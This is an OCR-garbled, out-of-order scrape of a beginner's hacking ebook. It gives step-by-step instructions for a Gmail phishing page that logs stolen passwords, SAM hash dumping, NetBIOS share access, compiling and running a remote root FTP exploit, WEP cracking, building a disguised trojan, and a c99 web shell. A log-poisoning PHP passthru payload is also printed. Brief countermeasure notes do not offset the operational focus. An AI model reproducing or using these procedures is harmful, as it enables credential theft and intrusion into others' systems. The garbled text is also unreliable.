62. ing to http www yourwebhosturl com youraccount list txt Although this is the most common the web host you use may provide a different looking URL Now if I put a username of myusername and a password of mypassword then list txt would now look like the following ltmpl detault ltmplcache z continue shttp mail google com mail Service mail rmHLalse Email myusername Fasswd mypassword rmshown 1 Sigqnin Sigqn in asts As you can see if you fell for this the hacker would have your email and password Scary eh Countermeasures will now show you all the countermeasures you should take to protect yourself from all of the password cracking attacks talked about in this chapter Social Engineering To protect yourself from social engineering attacks like the one discussed in this chapter you must learn to question the possible attacker If you get a phone call from someone and you think that there may be a chance that the person isn t who he says he is then ask him some questions that he should be able to answer to establish his legitimacy Some professional social engineers study the company before attacking so they might know all the answers That s why if you still have some doubts you should ask the head of whatever 45 department the attacker is from to find out if he is legit Better safe than sorry Shoulder Surfing When you type in your password make sure there is no one behind you a
63. is a Windows only password cracker and it uses rainbow tables to get the job done quickly It cracks passwords for both Windows XP and Vista but it is more powerful on XP because Vista fixed the security hole that allowed XP to crack passwords easily Windows uses a couple a couple types of hashes One of them is the LM Lan Manager hash If a password is longer than seven characters then it is split into seven character chunks made into all uppercase and then hashed with the DES encryption Because it is split into parts and made all uppercase the total number of different password combinations goes down significantly and makes it easier for hackers to crack the password The Windows password hashes are stored in a couple places 84 In the C WINDOWS system32 config directory where it is locked to all accounts but the system account which you don t have access to In the registry HKEY_ LOCAL MACHINESAM where it is also locked for all users So you might be wondering how can get a copy of those hashes There are a couple ways Boot from a Linux live CD and copy the SAM file onto a USB or floppy disk Use the PWDUMP program that comes with ophcrack to trick the registry into giving up the hashes First download and install ophcrack As you can see there are two versions In this example we will be using the program itself in windows so download the first option u Download R Download ophcrack All platforms op
64. knowledge of what s happening behind the scenes Intermediate hackers These people usually know about computers networks and have enough programming knowledge to understand relatively what a script might do but like the script kiddies they use pre developed well known exploits a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system to carry out attacks Elite Hackers These are the skilled hackers They are the ones that write the many hacker tools and exploits out there They can break into systems and hide their tracks or make it look like someone else did it You should strive to eventually reach this level What does it take to become a hacker Becoming a great hacker isn t easy and it doesn t happen quickly Being creative helps a lot There is more than one way a problem can be solved and as a hacker you encounter many problems The more creative you are the bigger chance you have of hacking a system without being detected Another huge 7 quality you must have is the will to learn because without it you will get nowhere Remember Knowledge is power Patience is also a must because many topics can be difficult to grasp and only over time will you master them Chapter Two Programming Do I Really Need It You might be asking yourself do even need to learn a programming language The answer to that is both yes and no It
65. lLoginauth serwice mail There are two action occurrences in the script so make sure you have the right one by looking at the form id name above Change the link between action to phish php This will make the form submit to your PHP phish script instead of to Google After the link you will see the code method Ah Change the word POST to GET so that it looks like method GET What the GET method does is submit the information you type in through the URL so that the PHP script can log it 8 Save and close the file 9 Next the hacker would upload the files up to a free webhost that supports PHP With a simple Google search you can come up with a bunch that fall under this category 10 Once all the files are uploaded you must give writing permissions to the list txt file Every hosting company should have a CHMOD option next to each file Select this option and change the file permission for list txt to 777 If you can t figure out how to do this ask people that use the same host or simply Google something similar to yourwebhostname chmod 44 11 Once everything is up and ready to go go to the link your host provided you for your website and you should see the Gmail page replica Type in a username password and click Sign in This should have redirected you to the real Gmail page 12 Now go take a look at your list txt file by going through your hosting file manager or go
66. n 2 Node I pAddress L192 168 1 161 Scope Id Met BIOS Remote Machine Mame Table Status DAUIDS MACHINE lt 66 gt DAUIDS MACHINE lt 20 gt MHS HOME MS HOME MHS HOME MEBROWSE lt 81 gt MAG Address UNIGUE UNI GUE GROUP GROUP UNI GUE GROUP HH BHF B5S Y7A SE HE 82 Registered Registered Registered Registered Registered Registered 9 Inthe above image DAVIDS MACHINE is the name of the target computer If you look to the right of it you will see the number lt 20 gt This means that file and printer sharing is enabled If there was no lt 20 gt then you could not go any further and would have to find a new target 10 Next the hacker would run the command net view TargetlIPaddress This command will display any shared drives folders files or printers If nothing comes up you won t be able to gain access to anything since there is nothing being shared In my case got the following gt Documents and Settings David Monet view s1972 168 1 161 Shared resources at 192 168 1 161 Share name Comment Send To OneNote 2007 HP Photosmart 8266 Series he command completed successfully 11 In my example have two printers shared and one disk named SharedDocs The hacker would be able to take control of my printers and view everything in my SharedDocs disk 12 To gain access to my SharedDocs disk the hacker would have to map out the drive onto his computer If su
67. n you can use Cygwin Cygwin is a Linux like environment that runs in Windows and acts as a Linux emulation layer allowing you to run Linux scripts in windows Although many Linux C C exploit scripts will work with Cygwin there are also many may not will show you how you can use Cygwin right after give you an example of compiling and running a C C script in Ubuntu Linux If you aren t already using Linux would recommend following along using VirtualBox from the Linux chapter 61 1 Open up Terminal a 3 Appl catio Places System GO P7 Live session user E Accessories P Calculator Character Map LAJ Dictionary e Internet 5 Disk Usage Analyzer il Office i zE Sound amp wideo wh Games P Graphics r Manage Print Jobs x Passwords and Encryption Keys I Take Screenshot E amp Terminal u Text Editor Si 2 Go to http milwOrm com exploits 269 and copy the remote root exploit 3 Open up the VI editor in the terminal by typing in vi and hitting lt Enter gt You should see the following screen im Add Remove UbUNtOG oObUONnto Ele Edit View Terminal Tabs Help VIM Vi IMproved version 7 1 138 by Bram Moolenaar et al Vim is open source and freely distributable Become a registered Vim user type help register lt Enter gt for information type q lt Enter gt to exit type helpeEnter gt or lt Fl gt
68. nd move it into the C cygwin directory as exploit c 67 10 Now it s time to run the exploit First you must change the directory to the home directory C cygwin by using the command cd Next use the Is command to display all the files in the current directory You should see exploit c 11 Now to compile the script we use the same command as we did in Ubuntu gcc exploit c o exploit Here you see that we added a new parameter o This simply tells the compiler to name the output exe exploit exe Hit lt ENTER gt and if no error messages came up then it was successful If you use the Is command again you should see a new file exploit exe in the directory 12 To run the exploit simply type exploit It will now display the scripts runtime directions Put in the right options and parameters and run the script again The picture below shows all of these steps being done Thumbs db cygdrive etc home proc usr yquin ico hin dew exploit c lib tmp var Thumbs db cygdrive etc exploit exe lib tmp var yqwin ico hin dey exploit c home proc user exploit HeroFTPD 1 3 4 lt 1 gt exploit by gitestil exploit options h hostname t target o offset Available targets H gt RedHat 6 2 with BeroFTPD 1 3 4 1 from tar gz i gt Slackware 7 86 with BeroFTPD 1 3 41 from tar gz 2 Mandrake 7 1 with BeroFIPD 1 3 4 lt 1 gt from rpm exploit h host her
69. ndy if the hacker was planning to attempt a social engineering attack against the company 2 Next the hacker would get the IP address of the website By going tohttp www selfseo com find_ip address of a _website php and inserting the web site URL it will spit out its IP address The IP address of google com is 64 233 187 99 The IP address 64 233 187 99 Is assigned to United States Enter URL google com Get IP 3 Next the hacker would Ping the server to see if it is up and running There s no point in trying to hack an offline server http just ping com pings a website from 34 different locations in the world Insert the website name or IP address and hit Ping If all packets went through then the server is up 49 e g Yahoo com or 66 94 234 13 ping google com Santa Clara U S A Okay 62 3 le T Vancouver Canada Okay 11 58 LE i l3 Mew York U S A Okay 27 0 Ele ae Florida US ae Okay d2 L 43 6 54 3 ale Okay 140 7 141 3 l4z 1 Austin U S A Okay 73 6 Heiss 74 2 San Francisco U S A Okay apie a8 S logd 4 Amsterdame Netherlands Okay LaSo 161 3 162 8 London United Kingdom Okay a5 5 56 6 37 9 Amsterdams Netherlands Okay 94 4 DES 56 93 Chicago U S A Okay ay aes 62 1 63 0 Amsterdam Netherlands Okay ieee 106 6 105 5 Coloqne Germany Ok ay l 103 2 103 3 Munchen Germany Okay 100 5 103 4 105 7 Paris France Okay 35 0 Sl 101 0 Madrid Spain Okay 123 8 LES dl 175 0 Stockholm Sweden Okay a
70. nowledgeable in the area of HTML and the PHP programming Below will show a simple example of some of the steps a hacker might take to create a phishing website By seeing the steps a hacker would take will help you defend against such an attack 1 First the hacker chooses a target The most popular targets for phishing attacks are e mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e mail he also gets access to a load of other user information for all the other websites you use In this example we will pretend the hacker chose Gmail as his target 2 After choosing his target the hacker will go to the website and save the whole main page use Mozilla Firefox highly recommend using this browser for its security and customization So would go to www gmail com and click File gt Save page as or simply hit lt CTR gt S 41 which does this automatically Choose where you would like to save the web page and hit Save gt Gmail Email from Google Mozilla Firefox AE Edit view History Delicious Bookmarks Tools Help Mew Window Ctrl h m New Tab Ctrl T I EI M eel Open Location Cbrl L Open File Chrl 0 Close Cr Welcome to Gmail Save Page As Ctrl 5 Send Link hto email Page Setup Print Preview rebmail built on the idea that email can be Print Ctrl P Import ed messages out of your inbox with Goog Work Offline Exit SS ey
71. of the bad data out and good data in 3 Install anti virus software 4 Scan your system with a vulnerability scanner This may reveal possible vulnerabilities in your system 69 Chapter Six Wireless Hacking Nowadays there are wireless hotspots everywhere You can get internet access with a wireless enabled laptop almost everywhere you go In this chapter will discuss ways a hacker goes about getting into secure wireless networks and things he can do once he is inside Scanning for Wireless Networks For this section and the following you will need to have a wireless card adapter The hacker starts by scanning for wireless networks near him The Windows tool we will use in this section is called NetStumbler Also by the time you receive this eBook MacStumbler may already be released for those of you using a Mac Some other similar programs are e Kismet for Windows and Linux e KisMac for the Mac 1 Download and install NetStumbler 2 Run it It automatically starts to scan for wireless access points 3 Once it is completed you should see a list of all the wireless access points around you i Network Stumbler 4003070711400 30 n31 Ble Edt em Device niw biel Channels MAC 810 Hame Chan Speed vendo a g l IOonsncsss2642 default 22 Mbps D Link A 2 OO01Z4F03F62 jg network ll Mbps Acer a OO0SNES044E09 Lynda s Network 1I Mbps Apple a N a i 000625769 20F LANA 11 Mbps Linksys a Oo0
72. out the remote server and list all the files and directories on it From here the hacker would find a directory that has read and write privileges and upload the shell but 109 this time as a php file so that incase the vulnerability is fixed he will be able to access it later on 9 The hacker would next find a way to gain root privileges on the system He can do this by uploading and running local exploits against the server He could also search the victim server for configuration files These files may contain username and passwords for the MYSQL databases and such To protect yourself from RFI attacks simply make sure you are using up to date scripts and make sure you server php ini file has register_globals and allow_url_fopen disabled Local File Inclusion Local File Inclusion LFI is when you have the ability to browse through the server by means of directory transversal One of the most common uses of LFI is to discover the etc passwd file This file contains the user information of a Linux system Hackers find sites vulnerable to LFI the same way discussed for RFI s Let s say a hacker found a vulnerable site www target site com index php p about by means of directory transversal he would try to browse to the etc passwd file www target site com index php p etc passwd The you up one directory and the amount to use depends where in the server you are located compared the location of the
73. rd from the hash you may be wondering how they know if your password is right when you login Well when you login and submit your username 40 and password a script takes your password and runs it through the md5 algorithm The outcome hash is compared to the hash stored in the database If they are the same you are admitted If were to run the word cheese through the md5 algorithm the outcome would be feaOf1f6fede90bd0a925b4194deac11 Having huge tables of every possible character combination hashed is a much better alternative to brute force cracking Once the rainbow tables are created cracking the password is a hundred times faster than brute forcing it will show an example of rainbow table cracking when we get into Windows password cracking Phishing Phishing is the process of stealing sensitive information such as usernames passwords and bank information by pretending to be someone you re not An example of this would be if you receive and e mail from a hacker pretending to be your bank In this e mail it might tell you that you need to update your account before it expires and then the hacker provides a link Once you click on the link you arrive at a website that looks exactly like your actual bank page In reality it s just a perfect replica and when you input your login details it sends it to the hackers email or stores it on his web server Hackers that create the best most deceiving phishing web pages are k
74. red is for the target machine to have file and printer sharing enabled and to have port 139 open Below will show you an example of what a hacker would do to gain access to a Windows machine through NetBIOS 1 First the hacker would search for a target A common tool used by hackers is Angry IP Scanner Download and install it 2 Next the hacker would insert the IP range he would like to scan If the hacker was connected to a WLAN Wireless Local Area Network he would scan the local computers like have shown below Angry IP Scanner 2 71 Fie Goto Commands Favorites Options Utis Help IF range 1492 1686 1 0 1 to 192 168 1 224 E Hostname davids machinge oo IP Se E Threads 0 IP Pig w lhostname i 3 Since the hacker s goal is to gain access to a system through NetBIOS which runs on port 139 he will choose to scan each found host for that port Click the downward arrow on the right and check the Scan ports box A popup will come up asking you if you would like to select anew port Click YES TEL Sean ports NYA IE a Ping Hosname w l Mo ports are currently selected For scanning Do you wank to select them 80 4 Type in the port number 139 into the first box and click OK select ports Enter ports to scan or use helpers below 2 Ports 39 Single port Port EEE Add Port range From to Add Note please be patient when scanning
75. remely long Creating tables for passwords that are long takes a very long time and a lot of resources That is why there aren t many of these tables available Phishing Phishing attacks are very simple to avoid When you are asked to put your personal information into a website look up into the URL bar If for example you are supposed to be on Gmail com and in the URL bar it says something completely different like gmail randomsite com or gamilmail com then you know this is a fake When you are on the real Gmail website the URL should begin with www google com anything else is a fake More Programs Now that you know what password cracking is you might be interested in learning some more of the popular cracking software have listed below e Canand Abel e Johnthe Ripper e THCHydra e SolarWinds e RainbowCrack 47 Chapter Five Network Hacking 48 Footprinting Footprinting is the act of gathering information about a computer system and the companies it belongs to Footprinting is the first step hackers take in their hacking process Footprinting is important because to hack a system the hacker must first know everything there is to know about it Below will give you examples of the steps and services a hacker would use to get information from a website 1 First ahacker would start gathering information on the targets website Things a hacker would look for are e mails and names This information could come in ha
76. ropriate option which in this case is FTP 5 The default port is 21 but some websites change this to make them a little more secure If you find out that the port isn t 21 you can find the right one by doing a port scan We will get into this later in the book 6 If you don t know any of the usernames for the FTP server then you will have to get a list of the most common usernames 7 Fora dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list You can get some good password lists at 36 acketstormsecurity org Crackers wordlists Below are examples of what a username and password list might look like E users Notepad File Edit Format View Help admin administrator E words Notepad File Edit Format View ada abe academia academic access ada admin administrator adrian adrianna aerobics airplane albany albatross albert alex alexander alf algebra alias aliases alice alicia alisa alison 8 Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists Target 127 0 0 1 verified a a user fle containing 6 users mu ned password file containing 815 Passwords Maximum number of authentication attempts will be 43908 Engaging target 127 0 0 1 with FTP 9 If you re lucky eventually it ll get the right Username Password combination As you
77. rver that contains the PHP executable file In WAMP the directory would be C wamp bin php php5 2 5 of course the last directory version number changes with newer versions Next open up the command prompt or terminal if you are using a Mac and go to the PHP directory by using the CD change directory command followed by the directory location er C WINDOWS system3 cmd exe Microsoft Windows AP Version 5 1 2600 CC Copyright 1985 2601 Microsoft Corp C 5 Documents and Settings David Mocd Co wanpsbinsphpsphps 2 5 Swanp bin php php5 2 53 Now it s time to run the exploit To run it simple type in php exploit php and hit enter You should get a couple errors yanp bin php php5 2 5 gt php exploit php otice Undefined variable junk in GC wanpsbinsphpphp5S 2 5 exploit php on line 18 Fatal error Call to undefined function socket_createt gt in C wampsbinsphp php5 2 5 exploit php on line 28 wanp bin php php5 2 5 gt _ 58 4 When skilled hackers create exploits they sometimes insert mistakes or extra code so that script kiddies with no programming knowledge wouldn t be able to use them The above is a simple example If you go to line 18 of this exploit will see the line Sjunk sun tzu sun tzu sun tzu This line was inserted to throw off the script kiddies and by simply removing it the error will disappear Just another reason why it s helpful to l
78. s Everything you do will be stored temporarily in your RAM Below are the steps to create a Live CD 13 1 Download the Ubuntu Live CD iso file from www ubuntu com Download Ubuntu 8 10 Coming Soon Ubuntu 8 04 LTS Can t wait Download the beta now Test it and give us ee your feedback to make an even better release E J A o Upgrade t We would like your help in testing and improving the pre release version but we don t 0o R Pg yet recommend its use in production environments 3 Get Ubuntu About Ubuntu af Download Ubuntu now for free request a free CD or Ubuntu is a community developed Linux based operating system that is buy it on DVD or CD perfect for laptops desktops and servers It contains all the applications you need a web browser presentation document and spreadsheet software instant messaging and much more Get Support Free documentation and a about Ubuntu Take the desktop tour community support or buy professional support Desktop Edition Server Edition gt Get Involved Ubuntu Store Share technical know how with other users or help to promote Ubuntu Press Room Get Developing Ubuntu server team wants to P Share your development L z L gt know how do you Ubuntu expertise and help shape sarn more gt earn more gt 25th September 2008 the future of Ubuntu The Ubuntu promise Canonical to Offer Yahoo latest news RSS feed e Ubuntu will alway
79. s 2seed ubuntu seed boot casper initrd casper initrd g quiet splash Fi Fe Fa Fo a o He A m 2 Right Ctrl 31 Learning Linux Now that you have Ubuntu up and running you might be wondering what to do next You should now start to learn and eventually master the Linux distribution of your choice You ll find that almost every distribution has a massive community that is ready to help you and it s only a Google search away For example if you choose to stick with Ubuntu http ubuntuforums org has a community of 700 000 members So if you have a question or problems ask away there will always be someone out there with a solution would also recommend buying a book Reading is the best way to gain knowledge Below have a list of some great books you should take a look at e A Practical Guide to Linuxl Commands Editors and Shell Programming e Understanding the Linux Kernel Third Edition e A Practical Guide to Ubuntu Linux e How Linux Works There are many websites on the internet dedicated to teaching the community about Linux Below I have a list of a few good ones e Official Linux Website e Begin Linux e Linux Tutorials For those of you that are visual learners below are two great video courses e Introduction to Linux e Ubuntu Linux Tutorials The resources listed above are more than enough for you to master the ins and outs of Linux So choose a book website or video and begin to take in some mor
80. s adapter 2 Download Backtrack and create a Live CD The tools we will be using on Backtrack are Kismet a wireless network detector airodump captures packets from a wireless router aireplay forges ARP requests aircrack decrypts the WEP keys Let s begin 1 First we will find a wireless access point along with its bssid essid and channel number To do this we will run kismet by opening up the terminal and typing in kismet It may ask you for the appropriate adapter which in my case is athO You can see your device s name by typing in the command iwconfig no wireless extensions IEEE 802 11g ESSID default Mode Managed Frequency 2 462 GHz Access Point 00 14 A5 35 7A 64 Bit Rate 54 Mb s Tx Power 18 dBm Sensitivity 0 3 Retry off RTS thr off Fragment thr off Power Management off Link Quality 50 94 Signal level 45 dBm Noise Level 95 dBm Rx invalid nwid 19994 Rx invalid crypt 0 Rx invalid frag 0 Tx excessive retries 1552 Invalid misc 1552 no wireless extensions wireless extensions 2 To be able to do some of the later things your wireless adapter must be put into monitor mode Kismet automatically does this and as long as you keep it open your wireless adapter will stay in monitor mode In kismet you will see the flags Y N O Each one stands for a different type of encryption In our case we will be looking for access points with the WEP encryption Y WEP N OPEN O OTHER usually WAP
81. s be free of charge including enterprise Zimbra Desktop through Ubuntu releases and security updates Partner Repositor e Ubuntu comes with full commercial support from Canonical and 7th August 2008 hundreds of companies around the world f e Ubuntu includes the very best translations and accessibility Unison released for Ubuntu to infrastructure that the free software community has to offer bring unified communications to e Ubuntu CDs contain only free software applications we Linux encourage you to use free and open source software improve it Sth August 2008 and pass it on News archive Read more about the Ubuntu philosophy gt Products gt Support gt Community Partners News Search Get Certified Get Ubuntu learn more You are here Home Get Ubuntu Download request a CD or buy on CD DVD How can you get Ubuntu Download Purchase There are now three ways for you to get Ubuntu Just choose the delivery option that works best for you gt Request CDs zp Download Ubuntu C Buy Ubuntu on CD Request free CDs Release Notes Upgrading Countdown Mirror Ubuntu scocesseveusenvenecccsesocscresscvotovsccenscsessceeseessevevacceucenscsenensossesesecesuecesessseese Download now Download the Ubuntu Edubuntu or Kubuntu cD installer to your computer now Please note the OD Installer is nearly 700M if you don t have a fast internet connection you may want to
82. s connection has limited or no connectiwity 92 Chapter Eight Malware Malware is a big problem today Everyday thousands of innocent people are getting infected by different types of malware The most common types of malware today are viruses worms and Trojans In this chapter we will discuss all the types of malware and give you an example of a windows trojan in use The reason we will use Windows is because malware is very rare in Linux and Mac computers Definitions 1 Viruses Viruses cannot spread without the help of us humans They are like parasites because they need a host to attach themselves to The host is usually a legitimate looking program or file Once this program is launched the virus is executed and infects other files on your computer Viruses can be very destructive They can do damage to your computer hardware software and files Viruses are spread through the sharing of files and are many times sent within emails via attachments 2 Worms A worm is a malicious program that can replicate itself onto other computers on a network Unlike a virus worms don t need a human to be able to spread and infect systems Once it infects a system it uses that system to send out other copies of itself to other random systems attempting to infect them 3 Trojan Horse A trojan horse is a malicious program that can be used to do silly things to a system like changing its desktop mess with the user interface and tak
83. s ecneeeeeeee es CENTER Henory Information ETF N CENTER CPU Information I Integrated Bevices Logerysalsct x dies ENTER Power Management ire CENTER Syston Security SENTER SPACE to change Picture property of www cyberwalker com Systen Dear N ei oui koe wed Neva vu 16 84 41 Systen Date VE ee 19 2886 Drive Configu i 2 Hard Disk D Detve t Hard Disk Dri Boot Sequencefif to nove doun up se Henory Information CENTER CPU Information OVD ED deine WDE CD ROM In snc lt ENTER gt this example Is first Integrated Devices LogacySelect Options CENTER Power Managenent JUSTER SOCULILY nen een sce sieve pele nen aie Roe LS eaters SENTER gt Picture property of www cyberwalker com If all went well you should see the Ubuntu boot options screen 19 Try Ubuntu without any change to your computer Boot Options seed ubuntu seed boot sc asper initrd casper initrd g quiet splash F1 F2 F3 F4 FS F6 You will first see a window full of countries Once you select yours you will see the main Ubuntu screen From here choose the first option to try Ubuntu without any risks Once the Ubuntu desktop has loaded and you decide you like what you see you have the option to install it by clicking on the install button on the desktop Wubi Wubi is my favorite option With the Wubi installer you can install and uninstall Ubuntu as any other Windows application Yo
84. s_log var log apache2 access_log var log apache access log var log apache2 access log var log access_log var log access log var www logs error_log var www logs error log usr local apache logs error_log usr local apache logs error log var log apache error_log var log apache2 error_log lf af ee ee ler les lese Aal ad elt T ey eee hae ul ol fe ey ae eee ll le lee loi feed he eh ahad olh al A al lel o aade A dedede Aeda ale By ee eee tl x had abe sil e a a Sal 111 le var log apache2 error log le var log error_log le var log error log Below are the steps a hacker would take to take gain access to the system through log injection 1 First the hacker would find what operating system version the target server is running and then search where the log files are located on that OS 2 Next through LFI the hacker would navigate to that file location If he is displayed with a bunch of logs then he may continue 3 The hacker would then inject some PHP code into the logs by typing lt Passthru S_GET cmd gt after in the URL This will cause the PHP script to be logged because there is no file by that name What this script will do is give the hacker shell access and allow him to execute system commands 4 Now if the hacker goes back to the log file he will see that his PHP script wasn t parsed and instead converted to
85. ses and Trojans that can easily bypass anti virus programs Countermeasures There are a couple things you can do to prevent yourself from being infected by the malware discussed in this chapter 1 Make sure you have good and up to date anti virus software installed on your computer Also if there is an automatic update option on your anti virus software make sure it is enabled 2 Make sure you have a firewall installed on your computer and make sure that it is actually enabled Firewalls protect against unauthorized inbound and outbound connections 103 Chapter Nine Web Hacking 104 With the Web 2 0 era upon us most websites are dynamic and allow the users to interact with the content Many of the web applications that run these dynamic websites have security flaws In this chapter we will discuss some of the most popular forms of attacks against web applications Cross Site Scripting Cross site scripting XSS occurs when a user inputs malicious data into a website which causes the application to do something it wasn t intended to do XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI CNN Ebay Apple Microsft and AOL Some website features commonly vulnerable to XSS attacks are e Search Engines e Login Forms e Comment Fields There are three types of XSS attacks 1 Local Local XSS attacks are by far the rarest and the hardest to pull off This atta
86. sionals on there that will be able to help you when you get stuck Practice Practice Practice Think of ideas for fun programs that you could make and program them 11 Chapter Three Linux What is it Linux is a free open source UNIX like operating system As you continue to learn how to hack you will realize how important it is to learn how to use the Linux operating system Need some convincing Here are a couple facts 1 Millions of servers on the internet run on the Linux operating system You must learn the operating system to be able to penetrate these web servers 2 Some of the best hacking programs only run on Linux Choosing a distribution A Linux distribution is the Linux kernel central component of an operating system plus a collection of applications If you are a beginner to Linux would suggest starting with Ubuntu as your first Linux distribution It is simple to install and very user friendly To see a full list of the most popular distributions can go to http distrowatch com Running Linux There are many ways to get Linux up and running will show you the most popular methods below Live CD Live CD s are usually used to test and play around with a Linux distribution With a Live CD you do not have to install the OS operating system onto your hard drive because it runs off the disc on boot Because it is running off a disc you won t be able to permanently modify any system file
87. ss networks under channels you will see a graph that shows the wireless network s signal strength The more green and the less spaces the better the signal be oO Channel K Pyt aks Silbe ts ET T o CEMA mari b er 7 Fi 5 As you can see NetStumbler provides a lot more than just the name SSID of the wireless network It provides the MAC address Channel number encryption type and a bunch more All of these come in use when a hacker decides he wants to get in the secured network by cracking the encryption The most common types of encryption are e WEP Wired Equivalent Privacy WEP isn t considered safe anymore Many flaws have been discovered that allow a hacker to crack a WEP key easily e WAP Wireless Application Protocol WAP is the currently the most secure and best option to secure your wireless network It s not as easily cracked as WEP because the only way to retrieve a WAP key is to use a brute force or dictionary attack If your key is secure enough a dictionary attack won t work and it could take decades to crack it if you brute force it This is why most hackers don t even bother 72 Cracking WEP In this section we will use be using the Live Linux distribution called BackTrack to crack WEP Backtrack comes with a huge list of preloaded software for this very purpose Before we begin there are a couple requirements 1 You need a computer with a compatible wireles
88. sssseees The 4 75 version of Lbuniy receives Jong term support 3 years jor desktop versions and 5 years yor server versions gt Case Studies What type of computer do you have Choose the ap Standard personal computer x86 architecture Pentium Celeron Athlon Sempron propriate one a 64bit AMD and Intel computers for your system of A Get Ubuntu Choose a location near you ned States MIT Media Lab arteren i m Get Support nun we g Start Download Get Involved C Check here if you need the alternate desktop CD This CD does not include the Live CD instead it uses a text based NA installer 2 fet Develonino Your Download Should Begin Shortly See all the latest gear for 8 04 The Ubuntu Store A including the limited edition CW heron t shirt If your download does not start in approximately 15 seconds you can click here to launch the download Download URL http ubuntu media mit edu ubuntu releases hardy ubuntu 8 04 1 desktop i386 iso Ubuntu Edition Ubuntu 8 04 1 desktop Computer Platform i386 Download Location http ubuntu media mit edu ubuntu releases While Opening UbuNntU 6 04 1 desktop 1366 iso t shirt Ubuntu items including a limited edition Heron You have chosen to open ubuntu 8 04 1 desktop i386 iso which is a PowerISO File from http fubuntu media mit edu want to print this page for your reference What should Fire
89. stall or download from the internet or install from files in a local directory Install from Internet downloaded files will be kept for future re use Download without Installing Install from Local Directory 4 Continue on until it asks you to choose a mirror to download from Choose any 66 u he Cygwin Setup Choose Download Site s Choose 4 Download Site Choose a site from this list or add your own sites to the list Available Download Sites http sm gore con http cygwin mirrors hoobly com http eu Very clever Com fio A mirors mission com http mirrors emission com http mirror calvin edu http mirror cps cmich edu ftp ftp gtlib gatech edu http eu gtlib gatech edu Ato kambing ul edu ftp miror cs wt edu http mirror cs wt edu ftp mirror mcs anil gov I L De Mr Re qi Sad al s User URL 5 Next you must select packages to download Click View under Devel to expand the category Expand the window so that you can see all of the columns Under the package column search for gcc core and click on Skip to select it and click next 6 If it tells you that you haven t selected a couple packages that you need agree to install them and click next 7 It will begin to install the packages 8 Once it is installed double click the desktop icon and a command prompt should come up 9 Using the same exploit as the last example save a
90. t Owned by hacker Listing directory 11 files and 0 directories Name Modify Owner Group 27 02 2006 01 11 09 lwg 80fp6 lwg80fp6 a 27 02 2006 01 11 09 lwg 80fp6 lwg80fp6 Image 4d php 30 07 2004 18 16 20 lwg 80fp6 lwg80fp6 1w r F Inf Ch Doy Image 44 action php 30 04 2004 10 54 04 lwg 80fp6 lwg80 fp6 r Inf Ch Doy Image Ebene ale 30 04 2004 10 53 59 lwg 80fp6 lwg80fp6 F Image change_action php 30 04 2004 lwg 80fp6 Iwg80fp6 r Image change action2 php 30 04 2004 10 53 53 lwg 80fp6 lwg80fp6 r LEE delete phe 30 04 2004 10 53 49 lwg 80fp6 lwg80fp6 r In Image delete_action php 30 2004 10 53 47 lwg 80fp6 lwg80 fp6 MW T F n DEH ne SNA 30 04 2004 10 53 42 Iwg 80fp6 lwg80fp6 r Image show php 30 04 2004 10 53 43 lwg 80fp6 lwg80fp6 r Image R IT 30 04 2004 10 54 0 lwg 80fp6 lwg80fp6 r Image start php 30 04 2004 10 53 42 lwg 80fp6 lwg80fp6 F EqEqEqEdE Image Vic selected 9 Confirm Command execute Select Execute Ir Execute v regexp Search CT choose MEOT Search Upload Make Dir Make File fhome wg 80fp 6 public_html news Jadmin inc Create thome flwg 80fp 6 public_html news fadmin ind Create Go Dir Go File thome lwg 80fp 6 public_html news admin inc Go thome lwg 80fp 6 public_html news fadmin ing c99shell v LO beta 9 06 2005 powered by Captain Crunch Security Team Generation time 0 1082 The shell will display information ab
91. tensions button to continue Here you choose what kind of server file to generate will stick with the default because it has icon support but exe s looks suspicious so it would be smart to change it 98 ku SCA Has icon support PY Crests Sever MH otitications Select Shyer Extension fa Eee Has icon support bee PIF Has no icon support fey COM Has no icon support BAT Has no icon support General Setting Bind wath File Server Extensions Server loon 4 Help Server Size 342 Kbayt 8 Click on Server Icon to continue Here you will choose an icon for your server file to have The icons help mask what the file actually is For my example will choose the regular text document icon since my file is a text document Create Server Notifications All ie OS 2 23 Fat General Settings 9 A p h Le bh E 8 Bind with File iw ela ii i then Server Extensions Server Icon Aj Serwer Size 342 Kbayt 99 9 Finally click on Create Server to you guessed it create the server file Below is what my server file looks like binded server 10 A hacker would probably rename it to something like Funny Joke and send it as an attachment to some people A hacker could also put it up as a torrent pretending it is something else like the latest game that just came out so he could get people to download it 11 Now will show you what happens when
92. the FTP software Now most people would move on to another port to try and find another possible vulnerability but this doesn t mean every hacker will If a skillful hacker is determined he may try to locate a vulnerability in the current software version and develop an exploit for it In the hacker community this new vulnerability would be called a 0 day O day vulnerabilities are very valuable in the hacker community for a few reasons e Noone knows about the vulnerability so the hacker could start hacking hundreds of websites before the vulnerability is discovered and patched e The hacker could sell the vulnerability for thousands of dollars e Discovering vulnerabilities and creating an exploit for it shows that the hacker is very skillful and raises his ranks in the hacker community You might be wondering why O days are worth so much It s very simple Ill explain it with a simple equation Hacker 0 Day Company Servers Bad Reputation Loss of Money Now before we get into the actual penetrations will discuss a couple of the common type of attacks used against discovered vulnerabilities Denial of Service DoS There are many types of DoS attacks but they all have one purpose to make the target server unavailable for legitimate users The most common type of DoS attack is when the hacker sends a flood of information to the target server causing it to use up all of its resources and in return pushing it offl
93. ttempting to peak If there is turn around and drop kick him her in the face No not really Also make sure you don t keep any sticky notes laying around that have your password or password hints on them Guessing To prevent this attack from happening never use a password like your birth date your mother s maiden name your pets name your spouse s name or anything that someone may be able to guess Dictionary Attacks Dictionary attacks are very simple to prevent Don t use a password that is inthe dictionary Some people may think that if they use a word from the dictionary but replace most of the letters with anumber then they are safe They are not There are 1337 speak dictionary s out there too Basically what 1337 speak is is changing a word like animal to An1m41 For a secure password would recommend using a phrase such as doyoulikecheese 88 Brute force Attacks Brute force attacks may be prevented by creating a very long password and using many numbers and odd characters The longer the password the longer it takes for the hacker to crack your password If after a few days the hacker hasn t been able to crack your password through a brute force attack then he is very likely to just give up Like I said in the dictionary attacks creating a phrase for your password is your best option for staying secure 46 Rainbow Tables You can avoid rainbow table cracking by simply making your password ext
